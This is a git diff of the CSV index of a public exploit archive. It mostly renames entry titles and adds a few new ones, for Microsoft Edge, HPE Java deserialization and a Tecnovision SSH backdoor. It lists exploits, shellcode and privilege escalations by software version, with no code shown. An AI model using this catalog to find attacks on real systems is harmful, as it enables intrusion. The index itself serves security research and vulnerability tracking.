diff --git a/files.csv b/files.csv index cb8ea457d..b49707ed4 100644 --- a/files.csv +++ b/files.csv @@ -676,7 +676,7 @@ id,file,description,date,author,platform,type,port 4801,platforms/windows/dos/4801.html,"SkyFex Client 1.0 - ActiveX 'Start()' Method Remote Stack Overflow",2007-12-28,shinnai,windows,dos,0 4829,platforms/windows/dos/4829.html,"DivX Player 6.6.0 - ActiveX 'SetPassword()' Denial of Service (PoC)",2008-01-02,anonymous,windows,dos,0 4856,platforms/multiple/dos/4856.php,"Half-Life CSTRIKE Server 1.6 - 'no-steam' Denial of Service",2008-01-06,"Eugene Minaev",multiple,dos,0 -4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server 8.5.2 - Remote Unauthenticated Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0 +4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server 8.5.2 - Unauthenticated Remote Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0 4881,platforms/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash",2008-01-10,kingcope,solaris,dos,0 4885,platforms/windows/dos/4885.txt,"QuickTime Player 7.3.1.70 - 'RTSP' Buffer Overflow",2008-01-10,"Luigi Auriemma",windows,dos,0 4893,platforms/linux/dos/4893.c,"Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote Denial of Service",2008-01-11,"Clemens Kurtenbach",linux,dos,0 @@ -5519,7 +5519,7 @@ id,file,description,date,author,platform,type,port 42052,platforms/multiple/dos/42052.txt,"Apple iOS/macOS - NSKeyedArchiver Memory Corruption Due to Lack of Bounds Checking in 'CAMediaTimingFunctionBuiltin'",2017-05-23,"Google Security Research",multiple,dos,0 42054,platforms/multiple/dos/42054.c,"Apple iOS/macOS Kernel - Use-After-Free Due to Bad Locking in Unix Domain Socket File Descriptor Externalization",2017-05-23,"Google Security Research",multiple,dos,0 42055,platforms/multiple/dos/42055.c,"Apple iOS/macOS Kernel - Memory Disclosure Due to Lack of Bounds Checking in netagent Socket Option Handling",2017-05-23,"Google Security Research",multiple,dos,0 -42056,platforms/macos/dos/42056.c,"Apple macOS - Local Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization",2017-05-23,"Google Security Research",macos,dos,0 +42056,platforms/macos/dos/42056.c,"Apple macOS - Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization",2017-05-23,"Google Security Research",macos,dos,0 42063,platforms/multiple/dos/42063.html,"Apple WebKit / Safari 10.0.3(12602.4.8) - 'WebCore::FrameView::scheduleRelayout' Use-After-Free",2017-05-25,"Google Security Research",multiple,dos,0 42070,platforms/multiple/dos/42070.c,"Skia Graphics Library - Heap Overflow due to Rounding Error in SkEdge::setLine",2017-05-25,"Google Security Research",multiple,dos,0 42071,platforms/multiple/dos/42071.html,"Mozilla Firefox < 53 - 'gfxTextRun' Out-of-Bounds Read",2017-05-25,"Google Security Research",multiple,dos,0 @@ -5678,6 +5678,8 @@ id,file,description,date,author,platform,type,port 42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Read with Malformed _glyf_ Table (win32k!fsc_CalcGrayRow)",2017-09-18,"Google Security Research",windows,dos,0 42748,platforms/windows/dos/42748.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42749,platforms/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 +42758,platforms/windows/dos/42758.txt,"Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading",2017-09-19,"Google Security Research",windows,dos,0 +42759,platforms/windows/dos/42759.html,"Microsoft Edge 38.14393.1066.0 - 'COptionsCollectionCacheItem::GetAt' Out-of-Bounds Read",2017-09-19,"Google Security Research",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -6039,7 +6041,7 @@ id,file,description,date,author,platform,type,port 2543,platforms/solaris/local/2543.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",solaris,local,0 2565,platforms/osx/local/2565.pl,"Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation",2006-10-15,"Kevin Finisterre",osx,local,0 2569,platforms/solaris/local/2569.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)",2006-10-16,"Marco Ivaldi",solaris,local,0 -2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - (root file create) Privilege Escalation",2006-10-16,"Kevin Finisterre",osx,local,0 +2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - (Root File Create) Privilege Escalation",2006-10-16,"Kevin Finisterre",osx,local,0 2581,platforms/linux/local/2581.c,"Nvidia Graphics Driver 8774 - Local Buffer Overflow",2006-10-16,"Rapid7 Security",linux,local,0 2633,platforms/hp-ux/local/2633.c,"HP-UX 11i - 'swpackage' Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2634,platforms/hp-ux/local/2634.c,"HP-UX 11i - (swmodify) Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 @@ -6048,7 +6050,7 @@ id,file,description,date,author,platform,type,port 2641,platforms/solaris/local/2641.sh,"Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)",2006-10-24,"Marco Ivaldi",solaris,local,0 2676,platforms/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Exploit",2006-10-29,Nanika,windows,local,0 2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - Symlink Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 -2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - (unsafe system call) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 +2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - (Unsafe System Call) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - 'libucache.dylib' Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0 40380,platforms/win_x86-64/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",win_x86-64,local,0 2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 - (M3U Filename) Local Buffer Overflow",2006-11-20,"Greg Linares",windows,local,0 @@ -6143,7 +6145,7 @@ id,file,description,date,author,platform,type,port 3823,platforms/windows/local/3823.c,"Winamp 5.34 - '.mp4' Code Execution",2007-04-30,Marsu,windows,local,0 3856,platforms/windows/local/3856.htm,"East Wind Software - 'advdaudio.ocx 1.5.1.1' Local Buffer Overflow",2007-05-05,shinnai,windows,local,0 3888,platforms/win_x86/local/3888.c,"GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",win_x86,local,0 -3897,platforms/windows/local/3897.c,"eTrust AntiVirus Agent r8 - Local Privilege Escalation",2007-05-11,binagres,windows,local,0 +3897,platforms/windows/local/3897.c,"eTrust AntiVirus Agent r8 - Privilege Escalation",2007-05-11,binagres,windows,local,0 3912,platforms/win_x86/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,win_x86,local,0 3975,platforms/windows/local/3975.c,"MagicISO 5.4 (build239) - '.cue' File Local Buffer Overflow",2007-05-23,vade79,windows,local,0 3985,platforms/osx/local/3985.txt,"Apple Mac OSX 10.4.8 - pppd Plugin Loading Privilege Escalation",2007-05-25,qaaz,osx,local,0 @@ -7250,7 +7252,7 @@ id,file,description,date,author,platform,type,port 18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - (SEH + ASLR + DEP Bypass)",2012-04-03,b33f,windows,local,0 18710,platforms/windows/local/18710.rb,"Csound - '.hetro' File Handling Stack Buffer Overflow (Metasploit)",2012-04-06,Metasploit,windows,local,0 18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0 -18733,platforms/linux/local/18733.py,"WICD 1.7.1 - Local Privilege Escalation",2012-04-12,anonymous,linux,local,0 +18733,platforms/linux/local/18733.py,"WICD 1.7.1 - Privilege Escalation",2012-04-12,anonymous,linux,local,0 18749,platforms/osx/local/18749.py,"Microsoft Office 2008 SP0 (Mac) - RTF pFragments Exploit",2012-04-18,"Abhishek Lyall",osx,local,0 18747,platforms/windows/local/18747.rb,"CyberLink Power2Go - name Attribute (p2g) Stack Buffer Overflow (Metasploit)",2012-04-18,Metasploit,windows,local,0 18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 - Buffer Overflow (Metasploit)",2012-04-18,Metasploit,windows,local,0 @@ -7267,7 +7269,7 @@ id,file,description,date,author,platform,type,port 18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 - Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0 18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0 18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit)",2012-05-21,Metasploit,windows,local,0 -18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Local Privilege Escalation",2012-05-22,sickness,windows,local,0 +18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation",2012-05-22,sickness,windows,local,0 18917,platforms/linux/local/18917.txt,"Apache Mod_Auth_OpenID - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0 18923,platforms/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow (Metasploit)",2012-05-25,Metasploit,windows,local,0 18981,platforms/windows/local/18981.txt,"Sysax 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0 @@ -8001,7 +8003,7 @@ id,file,description,date,author,platform,type,port 22067,platforms/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link",2002-12-04,"SAP Security",unix,local,0 22069,platforms/multiple/local/22069.py,"Oracle Database - Protocol Authentication Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0 22120,platforms/solaris/local/22120.c,"Sun Solaris 2.5.1/2.6/7.0/8/9 Wall - Spoofed Message Origin",2003-01-03,"Brant Roman",solaris,local,0 -22128,platforms/linux/local/22128.c,"H-Sphere Webshell 2.4 - Privilege Escalation",2003-01-06,"Carl Livitt",linux,local,0 +22128,platforms/linux/local/22128.c,"H-Sphere WebShell 2.4 - Privilege Escalation",2003-01-06,"Carl Livitt",linux,local,0 22189,platforms/linux/local/22189.txt,"MTink 0.9.x - Printer Status Monitor Environment Variable Buffer Overflow",2003-01-21,"Karol Wiesek",linux,local,0 22190,platforms/linux/local/22190.txt,"ESCPUtil 1.15.2 2 - Printer Name Local Buffer Overflow",2003-01-21,"Karol Wiesek",linux,local,0 22193,platforms/windows/local/22193.txt,"WinRAR 2.90/3.0/3.10 - Archive File Extension Buffer Overrun",2003-01-22,nesumin,windows,local,0 @@ -8429,7 +8431,7 @@ id,file,description,date,author,platform,type,port 29630,platforms/windows/local/29630.c,"Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure",2007-02-22,3APA3A,windows,local,0 30192,platforms/windows/local/30192.txt,"Kaspersky Internet Security 6.0 - SSDT Hooks Multiple Local Vulnerabilities",2007-06-15,"Matousec Transparent security",windows,local,0 29695,platforms/windows/local/29695.txt,"Comodo Firewall Pro 2.4.x - Local Protection Mechanism Bypass",2007-03-01,"Matousec Transparent security",windows,local,0 -29712,platforms/php/local/29712.txt,"Zend Platform 2.2.1 - PHP.INI File Modification",2007-03-03,"Stefan Esser",php,local,0 +29712,platforms/php/local/29712.txt,"Zend Platform 2.2.1 - 'PHP.INI' File Modification",2007-03-03,"Stefan Esser",php,local,0 29714,platforms/linux/local/29714.txt,"Linux Kernel 2.6.17 - 'Sys_Tee' Privilege Escalation",2007-03-05,"Michael Kerrisk",linux,local,0 29798,platforms/windows/local/29798.pl,"ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",windows,local,0 29746,platforms/linux/local/29746.txt,"Horde Framework and IMP 2.x/3.x - Cleanup Cron Script Arbitrary File Deletion",2007-03-15,anonymous,linux,local,0 @@ -8827,7 +8829,7 @@ id,file,description,date,author,platform,type,port 38533,platforms/windows/local/38533.c,"Microsoft Windows 10 - pcap Driver Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0 38540,platforms/osx/local/38540.rb,"Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0 38559,platforms/linux/local/38559.txt,"Linux Kernel 3.3.5 - 'b43' Wireless Driver Privilege Escalation",2013-06-07,"Kees Cook",linux,local,0 -38576,platforms/aix/local/38576.sh,"AIX 7.1 - lquerylv Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0 +38576,platforms/aix/local/38576.sh,"AIX 7.1 - 'lquerylv' Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0 38600,platforms/windows/local/38600.py,"Sam Spade 1.14 - (Crawl website) Buffer Overflow",2015-11-02,MandawCoder,windows,local,0 38601,platforms/windows/local/38601.py,"Sam Spade 1.14 - (Scan Addresses) Buffer Overflow",2015-11-02,VIKRAMADITYA,windows,local,0 38603,platforms/windows/local/38603.py,"TCPing 2.1.0 - Buffer Overflow",2015-11-02,hyp3rlinx,windows,local,0 @@ -9001,7 +9003,7 @@ id,file,description,date,author,platform,type,port 40489,platforms/linux/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",linux,local,0 40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0 40494,platforms/windows/local/40494.txt,"Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0 -40497,platforms/windows/local/40497.txt,"sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,windows,local,0 +40497,platforms/windows/local/40497.txt,"Sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,windows,local,0 40564,platforms/win_x86/local/40564.c,"Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)",2016-10-18,"Tomislav Paskalev",win_x86,local,0 40503,platforms/linux/local/40503.rb,"Linux Kernel 3.13.1 - 'Recvmmsg' Privilege Escalation (Metasploit)",2016-10-11,Metasploit,linux,local,0 40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0 @@ -9169,7 +9171,7 @@ id,file,description,date,author,platform,type,port 41951,platforms/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation",2017-05-01,"Han Sahin",osx,local,0 41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0 41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0 -41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0 +41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0 41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0 41971,platforms/windows/local/41971.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-05-08,Muhann4d,windows,local,0 41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0 @@ -9206,7 +9208,7 @@ id,file,description,date,author,platform,type,port 42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0 42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 -42542,platforms/windows/local/42542.txt,"Automated Logic WebCTRL 6.5 - Local Privilege Escalation",2017-08-22,LiquidWorm,windows,local,0 +42542,platforms/windows/local/42542.txt,"Automated Logic WebCTRL 6.5 - Privilege Escalation",2017-08-22,LiquidWorm,windows,local,0 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0 42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0 42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0 @@ -9245,7 +9247,7 @@ id,file,description,date,author,platform,type,port 42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0 42665,platforms/windows/local/42665.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation",2017-09-12,mr_me,windows,local,0 42718,platforms/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",windows,local,0 -42735,platforms/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",windows,local,0 +42735,platforms/windows/local/42735.c,"Netdecision 5.8.2 - Privilege Escalation",2017-09-16,"Peter Baris",windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -12923,7 +12925,7 @@ id,file,description,date,author,platform,type,port 22106,platforms/linux/remote/22106.txt,"CUPS 1.1.x - Negative Length HTTP Header",2002-12-19,iDefense,linux,remote,0 22112,platforms/windows/remote/22112.txt,"PlatinumFTPServer 1.0.6 - Information Disclosure",2002-12-30,"Dennis Rand",windows,remote,0 22113,platforms/windows/remote/22113.txt,"PlatinumFTPServer 1.0.6 - Arbitrary File Deletion",2002-12-30,"Dennis Rand",windows,remote,0 -22129,platforms/linux/remote/22129.c,"H-Sphere Webshell 2.4 - Remote Command Execution",2003-01-06,"Carl Livitt",linux,remote,0 +22129,platforms/linux/remote/22129.c,"H-Sphere WebShell 2.4 - Remote Command Execution",2003-01-06,"Carl Livitt",linux,remote,0 22130,platforms/multiple/remote/22130.txt,"AN HTTPD 1.41 e - Cross-Site Scripting",2003-01-06,D4rkGr3y,multiple,remote,0 22131,platforms/bsd/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",bsd,remote,0 22135,platforms/linux/remote/22135.c,"TANne 0.6.17 - Session Manager SysLog Format String",2003-01-07,"dong-h0un yoU",linux,remote,0 @@ -13131,7 +13133,7 @@ id,file,description,date,author,platform,type,port 22893,platforms/linux/remote/22893.c,"University of Minnesota Gopherd 2.0.x/2.3/3.0.x - FTP Gateway Buffer Overflow",2003-07-11,V9,linux,remote,0 22894,platforms/linux/remote/22894.c,"University of Minnesota Gopherd 2.0.x/2.3/3.0.x - GSisText Buffer Overflow",2003-07-11,V9,linux,remote,0 22898,platforms/hardware/remote/22898.txt,"Asus AAM6330BI/AAM6000EV ADSL Router - Information Disclosure",2003-07-14,cw,hardware,remote,0 -22903,platforms/windows/remote/22903.rb,"NetIQ Privileged User Manager 2.3.1 - 'ldapagnt_eval()' Remote Perl Code Execution (Metasploit)",2012-11-22,Metasploit,windows,remote,0 +22903,platforms/windows/remote/22903.rb,"NetIQ Privileged User Manager 2.3.1 - 'ldapagnt_eval()' Perl Remote Code Execution (Metasploit)",2012-11-22,Metasploit,windows,remote,0 22905,platforms/windows/remote/22905.rb,"Apple QuickTime 7.7.2 - TeXML Style Element font-table Field Stack Buffer Overflow (Metasploit)",2012-11-24,Metasploit,windows,remote,0 22908,platforms/linux/remote/22908.c,"Exceed 5.0/6.0/6.1/7.1/8.0 - Font Name Handler Buffer Overflow",2003-07-15,c0ntex,linux,remote,0 22909,platforms/windows/remote/22909.txt,"NetSuite 1.0/1.2 - HTTP Server Directory Traversal",2003-07-15,dr_insane,windows,remote,0 @@ -13628,10 +13630,10 @@ id,file,description,date,author,platform,type,port 24897,platforms/windows/remote/24897.rb,"KNet Web Server 1.04b - Buffer Overflow (SEH)",2013-03-29,"Myo Soe",windows,remote,0 24943,platforms/windows/remote/24943.py,"BigAnt Server 2.97 - DDNF 'Username' Buffer Overflow",2013-04-10,"Craig Freyman",windows,remote,0 24955,platforms/linux/remote/24955.rb,"Nagios Remote Plugin Executor - Arbitrary Command Execution (Metasploit)",2013-04-12,Metasploit,linux,remote,5666 -24902,platforms/php/remote/24902.rb,"STUNSHELL Web Shell - Remote PHP Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote,0 +24902,platforms/php/remote/24902.rb,"STUNSHELL Web Shell - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote,0 24903,platforms/php/remote/24903.rb,"STUNSHELL Web Shell - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote,0 24904,platforms/windows/remote/24904.rb,"Java CMM - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,windows,remote,0 -24905,platforms/multiple/remote/24905.rb,"v0pCr3w Web Shell - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,multiple,remote,0 +24905,platforms/multiple/remote/24905.rb,"v0pCr3w (Web Shell) - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,multiple,remote,0 24907,platforms/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",windows,remote,0 24931,platforms/hardware/remote/24931.rb,"Netgear DGN1000B - setup.cgi Remote Command Execution (Metasploit)",2013-04-08,Metasploit,hardware,remote,0 24935,platforms/linux/remote/24935.rb,"MongoDB - nativeHelper.apply Remote Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0 @@ -13887,7 +13889,7 @@ id,file,description,date,author,platform,type,port 26536,platforms/linux/remote/26536.txt,"Qualcomm WorldMail Server 3.0 - Directory Traversal",2005-11-17,FistFuXXer,linux,remote,0 26540,platforms/linux/remote/26540.txt,"Inkscape 0.41/0.42 - '.SVG' Image Buffer Overflow",2005-11-21,"Joxean Koret",linux,remote,0 26542,platforms/multiple/remote/26542.txt,"Apache Struts 1.2.7 - Error Response Cross-Site Scripting",2005-11-21,"Irene Abezgauz",multiple,remote,0 -26622,platforms/php/remote/26622.rb,"InstantCMS 1.6 - Remote PHP Code Execution (Metasploit)",2013-07-05,Metasploit,php,remote,0 +26622,platforms/php/remote/26622.rb,"InstantCMS 1.6 - PHP Remote Code Execution (Metasploit)",2013-07-05,Metasploit,php,remote,0 40386,platforms/hardware/remote/40386.py,"Cisco ASA 9.2(3) - 'EXTRABACON' Authentication Bypass",2016-09-16,"Sean Dillon",hardware,remote,161 26737,platforms/lin_x86/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit",2013-07-11,kingcope,lin_x86,remote,0 26739,platforms/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Stack Buffer Overflow",2013-07-11,superkojiman,windows,remote,80 @@ -15583,7 +15585,7 @@ id,file,description,date,author,platform,type,port 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,hardware,remote,0 40846,platforms/android/remote/40846.html,"Google Android - 'BadKernel' Remote Code Execution",2016-11-28,"Guang Gong",android,remote,0 40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0 -40130,platforms/php/remote/40130.rb,"Drupal Module RESTWS 7.x - Remote PHP Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80 +40130,platforms/php/remote/40130.rb,"Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80 40136,platforms/linux/remote/40136.py,"OpenSSH 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22 40138,platforms/windows/remote/40138.py,"TFTP Server 1.4 - 'WRQ' Buffer Overflow (Egghunter)",2016-07-21,"Karn Ganeshen",windows,remote,69 40142,platforms/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0 @@ -15720,6 +15722,7 @@ id,file,description,date,author,platform,type,port 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0 42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80 42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80 +42756,platforms/java/remote/42756.py,"HPE < 7.2 - Java Deserialization",2017-09-19,"Raphael Kuhn",java,remote,0 42587,platforms/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,hardware,remote,9251 42316,platforms/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,windows,remote,0 41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0 @@ -15838,6 +15841,7 @@ id,file,description,date,author,platform,type,port 42724,platforms/windows/remote/42724.rb,"KingScada AlarmServer 3.1.2.13 - Stack Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,12401 42725,platforms/windows/remote/42725.rb,"Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)",2017-09-14,"James Fitts",windows,remote,69 42726,platforms/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",hardware,remote,0 +42753,platforms/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor",2017-05-14,"Simon Brannstrom",multiple,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -16615,7 +16619,7 @@ id,file,description,date,author,platform,type,port 1069,platforms/php/webapps/1069.php,"UBBCentral UBB.Threads < 6.5.2 Beta - 'mailthread.php' SQL Injection",2005-06-25,mh_p0rtal,php,webapps,0 1070,platforms/asp/webapps/1070.pl,"ASPNuke 0.80 - 'article.asp' SQL Injection",2005-06-27,mh_p0rtal,asp,webapps,0 1071,platforms/asp/webapps/1071.pl,"ASPNuke 0.80 - 'comment_post.asp' SQL Injection",2005-06-27,"Alberto Trivero",asp,webapps,0 -1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 - (highlight) 